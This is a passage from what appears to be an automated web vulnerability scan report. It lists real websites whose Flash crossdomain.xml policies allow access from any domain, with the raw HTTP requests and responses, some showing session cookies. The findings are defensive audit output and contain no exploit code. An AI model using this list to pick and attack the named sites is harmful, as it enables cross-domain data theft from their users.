Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.manualsonline.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:46:14 GMT
Server: Apache/2.2.14 (Fedora)
Last-Modified: Wed, 26 Jan 2011 14:52:42 GMT
ETag: "d746c4-ef-49ac0fc2c4280"
Accept-Ranges: bytes
Content-Length: 239
Connection: close
Content-Type: text/xml

<?xml version="1.0" ?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*"/>
<allow-http-request-headers-from domain="*" heade
...[SNIP]...

7.83. http://www.mapquest.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mapquest.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mapquest.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_Id=ZGVmYXVsdDpudWxs; Path=/
Set-Cookie: tsession="oMxvAHE6AVKXbBWonwSpcUH2bX4="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Sat, 02-Apr-2011 13:07:31 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Sat, 02-Apr-2011 12:52:31 GMT; Path=/
Set-Cookie: psession="XYhsFEjJgX/0tbwu99Px6nQHTiA="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Fri, 01-Jul-2011 12:37:31 GMT; Path=/
Set-Cookie: c_Id=MjMzOjM5Mw%3D%3D; Expires=Sat, 02-Apr-2011 13:07:31 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"209-1301684392000"
Last-Modified: Fri, 01 Apr 2011 18:59:52 GMT
Content-Type: application/xml
Content-Length: 209
Date: Sat, 02 Apr 2011 12:37:31 GMT
Connection: keep-alive

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" secure="false"/></cross-domain
...[SNIP]...

7.84. http://www.marthastewart.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.marthastewart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marthastewart.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 04 Mar 2009 21:36:48 GMT
ETag: "fcbe29-c0-d951fc00"
Accept-Ranges: bytes
Content-Length: 192
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:34:19 GMT
Connection: close

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
   <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

7.85. http://www.mate1.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mate1.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mate1.net

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:56:37 GMT
Server: Apache
Set-Cookie: DATESESS=fbd31cc9c09d8951; domain=.mate1.com; path=/
P3P: policyref="http://www.mate1.com/p3p/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Cache-Control: max-age=0, private
Expires: Sat, 02 Apr 2011 13:56:37 GMT
Content-Length: 267
Content-Type: application/xml
X-Cache: MISS from crtv4.mate1.com
Via: 1.1 crtv4.mate1.com:80 (squid/2.7.STABLE7)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" to-ports="*" />
...[SNIP]...

7.86. http://www.menshealth.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.menshealth.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Thu, 03 Jan 2008 12:17:58 GMT
ETag: "c9-62610980"
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:36:12 GMT
Content-Length: 201
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

7.87. http://www.metacafe.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.metacafe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.metacafe.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 03 Mar 2011 16:22:13 GMT
ETag: "17f18a6-d0-49d966e98b740"
Accept-Ranges: bytes
Content-Length: 208
Content-Type: application/xml
Cache-Control: max-age=86400
Date: Sat, 02 Apr 2011 13:23:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.88. http://www.metrolyrics.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.metrolyrics.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.metrolyrics.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
ETag: "c4-4c72c0fe-0"
Last-Modified: Mon, 23 Aug 2010 18:42:06 GMT
Content-Type: application/xml
Content-Length: 196
Date: Sat, 02 Apr 2011 13:25:39 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

7.89. http://www.minorleaguebaseball.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.minorleaguebaseball.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.minorleaguebaseball.com

Response

HTTP/1.0 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sat, 02 Apr 2011 13:37:49 GMT
Content-Type: text/xml
Content-Length: 80
Cache-Control: max-age=60
Edge-control: max-age=60
Last-Modified: Mon, 16 May 2005 18:12:09 GMT
ETag: "50-4288e279"
Accept-Ranges: bytes
Age: 47
X-Cache: HIT from cache.mlb.com
Via: 1.1 cache.mlb.com:8888 (squid/2.7.STABLE6)
Connection: keep-alive

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

7.90. http://www.mlb.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mlb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and uses a wildcard to specify allowed domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mlb.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 18 Jan 2011 20:14:01 GMT
Content-Length: 428
Accept-Ranges: bytes
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sat, 02 Apr 2011 13:24:42 GMT
Cache-Control: max-age=60
Edge-control: max-age=60
ETag: "1ac-4d35f489"
Age: 25
X-Cache: HIT from cache.mlb.com
Via: 1.1 cache.mlb.com:8888 (squid/2.7.STABLE6)
Connection: keep-alive

<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-access-from domain="*.mlb.com" secure="false" />
   <allow-http-request-headers-from domain="*.mlb.com" headers="*" secure="false"/>
   <site
...[SNIP]...

7.91. http://www.mmo-champion.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmo-champion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mmo-champion.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 23 Nov 2010 22:26:07 GMT
Content-Length: 332
Date: Sat, 02 Apr 2011 13:46:14 GMT
Connection: close
X-Cache-Hits: -1
X-URL: /crossdomain.xml
X-Backend: phpservers2
X-Req: 455438597
X-Language: en

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-pol
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.92. http://www.mtv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mtv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Tue, 15 Apr 2008 20:18:17 GMT
ETag: "4b5484c-117-44aef19c7b440"
Accept-Ranges: bytes
Content-Length: 279
Content-Type: application/xml
Cache-Control: max-age=600
Date: Sat, 02 Apr 2011 12:43:43 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
   <al
...[SNIP]...

7.93. http://www.myrecipes.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myrecipes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.myrecipes.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:13 GMT
Server: Apache
Last-Modified: Tue, 05 Oct 2010 18:26:00 GMT
ETag: "b13f7-d9-491e2caecde00"
Accept-Ranges: bytes
Content-Length: 217
Content-Type: application/xml
Vary: X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi O TRo IND DSP CAO COR'
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cros
...[SNIP]...

7.94. http://www.ncm.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ncm.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ncm.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 25 Mar 2011 13:00:36 GMT
Accept-Ranges: bytes
ETag: "072eca1eceacb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:35:56 GMT
Connection: close
Content-Length: 897

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="maste
...[SNIP]...
<allow-access-from domain="tst.ncmsocial.com"/>
<allow-access-from domain="localhost.ncmsocial.com"/>
<allow-access-from domain="dev.ncmsocial.com"/>
<allow-access-from domain="ncmsocial.com"/>
<allow-access-from domain="www.ncmsocial.com"/>
<allow-access-from domain="www.totaleclips.com"/>
<allow-access-from domain="totaleclips.com"/>
<allow-access-from domain="edgesuite.net"/>
<allow-access-from domain="progressive.totaleclips.com.edgesuite.net"/>
<allow-access-from domain="www.fathomevents.com"/>
<allow-access-from domain="www.movienightout.com"/>
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.95. http://www.newser.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newser.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.newser.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Expires: Sun, 29 Mar 2020 00:00:00 GMT
Last-Modified: Sun, 01 Feb 2009 20:47:39 GMT
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 14:03:49 GMT
Connection: close
Content-Length: 324

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.96. http://www.newsok.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsok.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.newsok.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 29 Jun 2010 19:32:53 GMT
ETag: "1bd06e-106-48a304daba340"
Accept-Ranges: bytes
Content-Type: text/xml
Connection: close
Date: Sat, 02 Apr 2011 12:52:35 GMT
Age: 556
Content-Length: 262

<?xml version="1.0"?>
<!-- http://static.newsok.biz/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="newsok..com" />
<allow-access-from domain="*.newsok..com" />
<allow-access-from domain="*" />
...[SNIP]...

7.97. http://www.nickjr.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nickjr.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nickjr.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Length: 864
Content-Type: text/xml
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:31:20 GMT; path=/
ETag: W/"864-1301149306000"
Vary: User-Agent
Cache-Control: max-age=1200
Date: Sat, 02 Apr 2011 13:31:20 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-polici
...[SNIP]...
<allow-access-from domain="*"/>
   <allow-access-from domain="*.doubleclick.net" />
   <allow-access-from domain="*.nickjr.com" />
   <allow-access-from domain="*.nickjr-d.mtvi.com" />
   <allow-access-from domain="*.nickjr-q.mtvi.com" />
   <allow-access-from domain="*.nick.com" />
   <allow-access-from domain="*.nick-d.mtvi.com" />
   <allow-access-from domain="*.nick-q.mtvi.com" />
   <allow-access-from domain="*.mtvi.com" />
   <allow-access-from domain="*.dimetapp.com" />
   <allow-access-from domain="*.mtvnservices.com"/>
   <allow-access-from domain="*.tween.as" />
...[SNIP]...

7.98. http://www.nola.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nola.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nola.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 324
Content-Type: text/xml
ETag: "71686e-144-47185a180bb40"
P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM'
ntCoent-Length: 324
Cache-Control: max-age=1
Expires: Sat, 02 Apr 2011 13:37:08 GMT
Date: Sat, 02 Apr 2011 13:37:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.99. http://www.nydailynews.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nydailynews.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:38 GMT
Server: Apache
Last-Modified: Fri, 14 Sep 2007 15:01:08 GMT
Accept-Ranges: bytes
Content-Length: 200
Keep-Alive: timeout=3, max=999
Content-Type: application/xml
Content-Language: en
Age: 0
Via: AX-CACHE-2.4:20
Set-Cookie: sto-id-sg-web-8080=BOACAKAK; Expires=Sat, 02-Apr-2011 02:23:19 GMT; Path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.100. http://www.oodle.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.oodle.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Last-Modified: Wed, 12 Mar 2008 00:55:41 GMT
ETag: "11c80ff-ca-44832e564dd40"
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:36:37 GMT
Content-Length: 202
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

7.101. http://www.openforum.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.openforum.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.openforum.com

Response

HTTP/1.0 200 OK
Content-Length: 390
Content-Type: text/xml
Last-Modified: Tue, 22 Mar 2011 14:34:04 GMT
Accept-Ranges: bytes
ETag: "1CBE89E31501600"
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: public, max-age=65014
Expires: Sun, 03 Apr 2011 07:43:08 GMT
Date: Sat, 02 Apr 2011 13:39:34 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.102. http://www.opportunity.co/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opportunity.co
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.opportunity.co

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:55:35 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Feb 2011 03:06:57 GMT
ETag: "48c0006-c3-f11a7640"
Accept-Ranges: bytes
Content-Length: 195
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

7.103. http://www.outdoorchannel.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outdoorchannel.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.outdoorchannel.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/xml
Last-Modified: Fri, 27 Aug 2010 15:20:56 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:07:28 GMT
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.outdoorchannel.com&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=8b192145-0a99-4adb-8be8-ad64d5a6e8cd; expires=Mon, 02-Apr-2012 14:07:28 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Mon, 02-Apr-2012 14:07:28 GMT; path=/
Content-Length: 208
Connection: close
Via: 1.1 AN-0016020121270012

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.104. http://www.pcworld.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pcworld.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"194-1297458026000"
Last-Modified: Fri, 11 Feb 2011 21:00:26 GMT
Content-Type: application/xml
Content-Length: 194
Date: Sat, 02 Apr 2011 14:10:44 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

7.105. http://www.people.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.people.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.people.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:25 GMT
Server: Apache
Last-Modified: Fri, 24 Sep 2010 16:23:49 GMT
ETag: "373-cdb58f40"
Accept-Ranges: bytes
Content-Length: 883
Content-Type: application/xml
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="img2.timeinc.net"/>
<allow-access-from domain="img2-short.timeinc.net"/>
<allow-access-from domain="*.aol.com"/>
<allow-access-from domain="*.digitalcity.com"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.channel.aol.com"/>
<allow-access-from domain="*.aimtoday.com"/>
<allow-access-from domain="*.aimtoday.aim.com"/>
<allow-access-from domain="*.dashboard.aim.com"/>
<allow-access-from domain="*.aim.com"/>
<allow-access-from domain="peopleconnection.aol.com"/>
<allow-access-from domain="*.peoplecmg.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
<allow-access-from domain="*.taaz.com" secure="true"/>
...[SNIP]...

7.106. http://www.peoplestylewatch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.peoplestylewatch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.peoplestylewatch.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:32 GMT
Server: Apache
Last-Modified: Fri, 24 Sep 2010 16:23:49 GMT
ETag: "373-cdb58f40"
Accept-Ranges: bytes
Content-Length: 883
Content-Type: application/xml
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="img2.timeinc.net"/>
